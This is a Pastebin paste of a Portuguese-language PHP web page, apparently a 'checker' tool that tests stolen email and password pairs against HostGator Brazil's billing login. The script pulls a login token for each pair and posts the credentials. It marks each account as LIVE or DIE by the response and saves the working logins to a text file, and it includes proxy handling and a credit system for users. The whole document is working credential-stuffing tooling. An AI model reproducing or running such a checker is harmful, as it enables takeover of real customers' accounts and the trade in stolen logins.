Advertisement
Guest User

Untitled

a guest
Aug 6th, 2016
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.81 KB | None | 0 0
  1. <link rel="stylesheet" href="https://cdn.rawgit.com/twbs/bootstrap/v4-dev/dist/css/bootstrap.css" integrity="sha384-XXXXXXXX" crossorigin="anonymous">
  2. <script src="https://cdn.rawgit.com/twbs/bootstrap/v4-dev/dist/js/bootstrap.js" integrity="sha384-XXXXXXXX" crossorigin="anonymous"></script>
  3. <!DOCTYPE html>
  4. <html>
  5. <head>
  6. <meta charset="UTF-8">
  7. <title>CHECKER | HOSTGATOR</title>
  8. <link rel="stylesheet" type="text/css" media="all" href="plugins/animate.css">
  9. <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no' name='viewport'>
  10. <link href="bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
  11. <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css" />
  12. <link href="http://code.ionicframework.com/ionicons/2.0.0/css/ionicons.min.css" rel="stylesheet" type="text/css" />
  13. <link href="plugins/morris/morris.css" rel="stylesheet" type="text/css" />
  14. <link href="plugins/jvectormap/jquery-jvectormap-1.2.2.css" rel="stylesheet" type="text/css" />
  15. <link href="plugins/daterangepicker/daterangepicker-bs3.css" rel="stylesheet" type="text/css" />
  16. <link href="dist/css/AdminLTE.min.css" rel="stylesheet" type="text/css" />
  17. <link href="dist/css/skins/_all-skins.min.css" rel="stylesheet" type="text/css" />
  18. <script type="text/javascript">
  19.  
  20. function catapau(){
  21. var count = parseInt($('#valor1').html());
  22. count++;
  23. $('#valor1').html(count+'');
  24. }
  25.  
  26. </script>
  27.  
  28.  
  29. </head>
  30. <body class="skin-blue">
  31. <div class="wrapper"><!-- Content Wrapper. Contains page content -->
  32. <!-- ./wrapper -->
  33. <script src="plugins/jQuery/jQuery-2.1.3.min.js"></script>
  34. <script src="bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
  35. <script src='plugins/fastclick/fastclick.min.js'></script>
  36. <script src="dist/js/app.min.js" type="text/javascript"></script>
  37. <script src="plugins/sparkline/jquery.sparkline.min.js" type="text/javascript"></script>
  38. <script src="plugins/jvectormap/jquery-jvectormap-1.2.2.min.js" type="text/javascript"></script>
  39. <script src="plugins/jvectormap/jquery-jvectormap-world-mill-en.js" type="text/javascript"></script>
  40. <script src="plugins/daterangepicker/daterangepicker.js" type="text/javascript"></script>
  41. <script src="plugins/datepicker/bootstrap-datepicker.js" type="text/javascript"></script>
  42. <script src="plugins/iCheck/icheck.min.js" type="text/javascript"></script>
  43. <script src="plugins/slimScroll/jquery.slimscroll.min.js" type="text/javascript"></script>
  44. <script src="plugins/chartjs/Chart.min.js" type="text/javascript"></script>
  45. <script src="dist/js/pages/dashboard2.js" type="text/javascript"></script>
  46. <script src="dist/js/demo.js" type="text/javascript"></script>
  47. <div class="content-wrapper">
  48. <!-- Content Header (Page header) -->
  49. <!-- Main content -->
  50. <section class="content">
  51. <!-- Info boxes -->
  52. <div class="zoomIn animated">
  53. <!-- Main content -->
  54. <center><img src="https://partnernoc.cpanel.net/logo/822-4021-logo.png"></img><br></center>
  55. <?php
  56. $sock = '';
  57. error_reporting(0);
  58. function getStr($string,$start,$end){
  59. $str = explode($start,$string);
  60. $str = explode($end,$str[1]);
  61. return $str[0];
  62. }
  63. class cURL {
  64. var $callback = false;
  65. function setCallback($func_name) {
  66. $this->callback = $func_name;
  67. }
  68. function doRequest($method, $url) {
  69. $ch = curl_init();
  70. global $email, $pwd , $token;
  71. curl_setopt($ch, CURLOPT_URL, $url);
  72. curl_setopt($ch, CURLOPT_HEADER, 1);
  73. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); // RADOM DOS NAVEGADORES
  74. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  75. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  76.  
  77. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  78. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  79. curl_setopt($ch, CURLOPT_COOKIESESSION, true );
  80. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/hostgator.txt'); //COOKIES DO NAVEGADOR
  81. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/hostgator.txt'); //COOKIES DO NAVEGADOR
  82. curl_setopt($ch, CURLOPT_REFERER, 'http://www.saraiva.com.br/'); //REFERER DA SEGUNDA CHAMADO
  83. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  84. if ($method == 'POST') {
  85. curl_setopt($ch, CURLOPT_POST, 1);
  86. curl_setopt($ch, CURLOPT_POSTFIELDS, 'token='.$token.'&username='.$email.'&password='.$pwd.''); //POST DO LIVE REQUESST
  87. }
  88. $data = curl_exec($ch); //AQUI PRA VER AS PAGINAS DE RESULTADO
  89. curl_close($ch);
  90. if ($data) {
  91. if ($this->callback) {
  92. $callback = $this->callback;
  93. $this->callback = false;
  94. return call_user_func($callback, $data);
  95. } else {
  96. return $data;
  97. }
  98. } else {
  99. return curl_error($ch);
  100. }
  101. }
  102. function get($url) {
  103. return $this->doRequest('GET', $url, 'NULL');
  104. }
  105. function post($url) {
  106. return $this->doRequest('POST', $url);
  107. }
  108. }
  109.  
  110. echo '
  111. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  112. <head></head>
  113. <style>
  114. </style>
  115. <script type="text/javascript">
  116. function pushPaypalDie(str){
  117. document.getElementById(\'listPaypalDie\').innerHTML += \'<div>\' + str + \'</div>\';
  118. }
  119. function pushPaypal(str){
  120. document.getElementById(\'listPaypal\').innerHTML += \'<div>\' + str + \'</div>\';
  121. }
  122. function pushWrongFormat(str){
  123. document.getElementById(\'listWrongFormat\').innerHTML += \'<div>\' + str + \'</div>\';
  124. }
  125. </script>
  126. </head>
  127. <body>
  128. <div class="main-content">
  129. <form method="post">
  130. <div align="center"><textarea name="mp" rows="10" class="form-control" placeholder="FORMATO: EMAIL|SENHA" style="width:90%">';
  131. if (isset($_POST['btn-submit']))
  132. echo $_POST['mp'];
  133. else
  134. echo '';
  135. ;
  136. echo '</textarea><br /> <br />
  137. SEPARADOR: <input type="text" style="width:20px; text-align: center;" name="delim" value="';
  138.  
  139. if (isset($_POST['btn-submit']))
  140. echo $_POST['delim'];
  141. else
  142. echo '|';
  143. ;
  144. echo '" size="1" /><input type="hidden" name="mail" value="';
  145. if (isset($_POST['btn-submit']))
  146. echo $_POST['mail'];
  147. else
  148. echo 0;
  149. ;
  150. echo '" size="1" /><input type="hidden" name="pwd" value="';
  151. if (isset($_POST['btn-submit']))
  152. echo $_POST['pwd'];
  153. else
  154. echo 1;
  155. ;
  156. echo '" size="1" />&nbsp;
  157. <br>
  158. <input type="submit" class="btn btn-info" value="CHECAR" name="btn-submit" /> </br>&nbsp;&nbsp;&nbsp;&nbsp;
  159. </div>
  160. </div>
  161. </form>
  162. ';
  163. set_time_limit(0);
  164. include("use.php");
  165. function fetch_value($str, $find_start, $find_end) {
  166. $start = strpos($str, $find_start);
  167. if ($start === false) {
  168. return "";
  169. }
  170. $length = strlen($find_start);
  171. $end = strpos(substr($str, $start + $length), $find_end);
  172. return trim(substr($str, $start + $length, $end));
  173. }
  174. function fetch_value_notrim($str, $find_start, $find_end) {
  175. $start = strpos($str, $find_start);
  176. if ($start === false) {
  177. return "";
  178. }
  179. $length = strlen($find_start);
  180. $end = strpos(substr($str, $start + $length), $find_end);
  181. return substr($str, $start + $length, $end);
  182. }
  183. $dir = dirname(__FILE__);
  184. $config['cookie_file'] = $dir . '/cookies/' . md5($_SERVER['REMOTE_ADDR']) . '.txt';
  185. if (!file_exists($config['cookie_file'])) {
  186. $fp = @fopen($config['cookie_file'], 'w');
  187. @fclose($fp);
  188. }
  189. $zzz = "";
  190. $live = array();
  191. function get($list) {
  192. preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/", $list, $socks);
  193. return $socks[0];
  194. }
  195. function delete_cookies() {
  196. global $config;
  197. $fp = @fopen($config['cookie_file'], 'w');
  198. @fclose($fp);
  199. }
  200. function xflush() {
  201. static $output_handler = null;
  202. if ($output_handler === null) {
  203. $output_handler = @ini_get('output_handler');
  204. }
  205.  
  206. if ($output_handler == 'ob_gzhandler') {
  207. return;
  208. }
  209.  
  210. flush();
  211. if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false) {
  212. @ob_flush();
  213. } else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE) {
  214. @ob_end_flush();
  215. @ob_start();
  216. }
  217. }
  218. function curl_grab_page($site,$proxy,$proxystatus){
  219. $chss = curl_init();
  220. curl_setopt($chss, CURLOPT_RETURNTRANSFER, TRUE);
  221. if ($proxystatus == 'on') {
  222. curl_setopt($chss, CURLOPT_SSL_VERIFYHOST, FALSE);
  223. curl_setopt($chss, CURLOPT_HTTPPROXYTUNNEL, TRUE);
  224. curl_setopt($chss, CURLOPT_PROXY, $proxy);
  225. }
  226. curl_setopt($chss, CURLOPT_COOKIEFILE, "cookie.txt");
  227. curl_setopt($chss, CURLOPT_URL, $site);
  228. return curl_exec($chss);
  229. curl_close ($chss);
  230.  
  231. }
  232. function display($str) {
  233. echo '<div>' . $str . '</div>';
  234. xflush();
  235. }
  236. //function pushSockDie($str) {
  237. // echo '<script type="text/javascript">pushSockDie(\'' . $str . '\');</script>';
  238. // xflush();
  239. //}
  240. function pushPaypalDie($str) {
  241. echo '<script type="text/javascript">pushPaypalDie(\'' . $str . '\');</script>';
  242. file_put_contents('api/accountsdead.txt', $str . PHP_EOL, FILE_APPEND);
  243. xflush();
  244. }
  245. function pushPaypal($str) {
  246. echo '<script type="text/javascript">pushPaypal(\'' . $str . '\');</script>';
  247. file_put_contents('api/accounts.txt', $str . PHP_EOL, FILE_APPEND);
  248. xflush();
  249. }
  250. function pushWrongFormat($str) {
  251. echo '<script type="text/javascript">pushWrongFormat(\'' . $str . '\');</script>';
  252. xflush();
  253. }
  254.  
  255. if (isset($_POST['btn-submit'])) {
  256.  
  257.  
  258.  
  259. ;
  260. echo '<br/>
  261. <br/>
  262.  
  263. <div class="bounceIn animated">
  264. <div class="box box-success">
  265. <div class="box-header">
  266. <h3 class="box-title"><i class="fa fa-list"></i>&nbsp;&nbsp;&nbsp;<strong>LIVE</strong></h3>
  267. </div>
  268. <div class="box-body">
  269. <div class="box-body" id="listPaypal" ></div>
  270. </div><!-- /.box-body -->
  271. </div>
  272.  
  273. <div class="box box-danger">
  274. <div class="box-header">
  275. <h3 class="box-title"><i class="fa fa-list"></i>&nbsp;&nbsp;&nbsp;<strong>DIE</strong> </h3>
  276. </div>
  277. <div class="box-body">
  278. <div class="box-body" id="listPaypalDie" ></div>
  279. </div><!-- /.box-body -->
  280. </div>
  281.  
  282. <div class="box box-warning">
  283. <div class="box-header">
  284. <h3 class="box-title"><i class="fa fa-list"></i>&nbsp;&nbsp;&nbsp;<strong>Unknow</strong>/<strong>Format</strong></h3>
  285. </div>
  286. <div class="box-body">
  287. <div class="box-body" id="listWrongFormat"></div>
  288. </div><!-- /.box-body -->
  289. </div>
  290. </div>
  291.  
  292. <br/>
  293.  
  294. <br/>
  295.  
  296.  
  297. ';
  298. xflush();
  299. $emails = explode("\n", trim($_POST['mp']));
  300. $eCount = count($emails);
  301. $failed = $live = $uncheck = array();
  302. $checked = 0;
  303. if (!count($emails)) {
  304.  
  305. }
  306. delete_cookies();
  307. //$sockClear = isSockClear();
  308. //if ($sockClear != 1) {
  309. //pushSockDie('[<font color="#FF0000">' . $sock . '</font>]');
  310. //continue;
  311. //}
  312.  
  313.  
  314.  
  315.  
  316. foreach ($emails AS $k => $line) {
  317. $info = explode($_POST['delim'], $line);
  318. $email = trim($info["{$_POST['mail']}"]);
  319. $pwd = trim($info["{$_POST['pwd']}"]);
  320. if (stripos($email, '@') === false || strlen($pwd) < 2) {
  321. unset($emails[$k]);
  322. pushWrongFormat($email . ' | ' . $pwd);
  323. continue;
  324. }
  325. //if ($failed[$sock] > 4)
  326. // continue;
  327.  
  328.  
  329. //DELETAR COOKIES
  330. if(file_exists(getcwd().'/hostgator.txt')) {
  331. unlink(getcwd().'/hostgator.txt');
  332. }
  333.  
  334.  
  335. $a = new cURL();
  336. $b = $a->get("https://financeiro.hostgator.com.br/");//CHAMADA TOKEN
  337. $token = getStr($b,'name="token" value="','"'); //CHAMADA TOKEN
  338. $c = new cURL();
  339. $d = $c->post("https://financeiro.hostgator.com.br/dologin.php"); //POST DA 2 CHAMADA
  340.  
  341.  
  342. if($d){
  343.  
  344.  
  345. if (stristr($d,'Sair') !== false) {
  346. /*MEIO*/
  347.  
  348. /* $aq = mysql_query("UPDATE `usuarios` SET `creditos`='$creditos' WHERE login_usuario='$login_usuario'");*/
  349.  
  350. /*FIM MEIO*/
  351. $xyz = "<b><font color=white>Entrou => $email</b> | <b>$pwd<b/> |</font> ";
  352. /*CONTA*/
  353. $live[] = $xyz;
  354. unset($emails[$k]);
  355. pushPaypal($xyz);
  356.  
  357. } else {
  358. pushPaypalDie("<b style=\"color:red\">DIE</b> => $sock | <b style=\"color:Gray11\" >$email<b> | $pwd ");
  359. unset($emails[$k]);
  360. }
  361. } elseif($dias >= 1) {
  362. if (stristr($d,'Sair') !== false) {
  363. $xyz = "<b style=\"color:SteelBlue\">[</b><b style=\"color:DodgerBlue\">SPRITEBUG</b><b style=\"color:SteelBlue\">]</b><b style=\"color:green\">LIVE</b> | <b style=\"color:black\" >$email</b> | <b style=\"color:black\">$pwd<b/> | <b style=\"color:Blue\"> [DIA:$dias]<b/> ";
  364. $live[] = $xyz;
  365. unset($emails[$k]);
  366. pushPaypal($xyz);
  367.  
  368. } else {
  369. pushPaypalDie("<b style=\"color:red\">DIE</b> => $sock | <b style=\"color:Gray11\" >$email<b> | $pwd ");
  370. unset($emails[$k]);
  371. }
  372. } else {
  373. echo "<script>alert('Você Não tem mais creditos :/ Minimo são 5 Creditos ')</script>";
  374. }
  375. }
  376.  
  377.  
  378.  
  379.  
  380.  
  381.  
  382.  
  383.  
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393. }
  394. if (count($emails)) {
  395. display("Sem Testar:");
  396. display('<textarea cols="80" rows="10">' . implode("\n", $emails) . '</textarea>');
  397. }
  398.  
  399. echo '</body>
  400. </html>';
  401. ?>
  402. </div>
  403. </div>
  404. </div>
  405. <!-- /.row --><!-- /.content -->
  406. </div>
  407. <!-- /.content-wrapper -->
  408.  
  409. </div>
  410. <script type="text/javascript">
  411. <!--
  412. var count = $('#cc').children().length;
  413. $('#quantiacc').html(count);
  414. var count = parseInt($('#quantiaccapos').html());
  415. count++;
  416. $('#quantiaccapos').html(count+'');
  417. $('#stop').attr("disabled", true);
  418. $("#loading").css("display", "none");
  419. $("#result").css("display", "none");
  420. $("#submit").on("click", function(){
  421. var texto = $.trim($('#logins').val());
  422. if ( texto.length > 20 ) {
  423. $("#result").css("display", "inline");
  424. $("#loading").css("display", "inline");
  425. $('#stop').attr("disabled", false);
  426. $('#submit').attr("disabled", "disabled");
  427. } else {
  428. alert("Não Há CCs ou invalido!!");
  429. $("#loading").css("display", "none");
  430. $('#stop').attr("disabled", true);
  431. $('#submit').attr("disabled", false);
  432. return false;
  433. }
  434. });
  435. $( "#stop" ).click(function() {
  436. $("#loading").css("display", "none");
  437. $('#stop').attr("disabled", true);
  438. $('#submit').attr("disabled", false);
  439. });
  440. //-->
  441. </script>
  442. </body>
  443. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement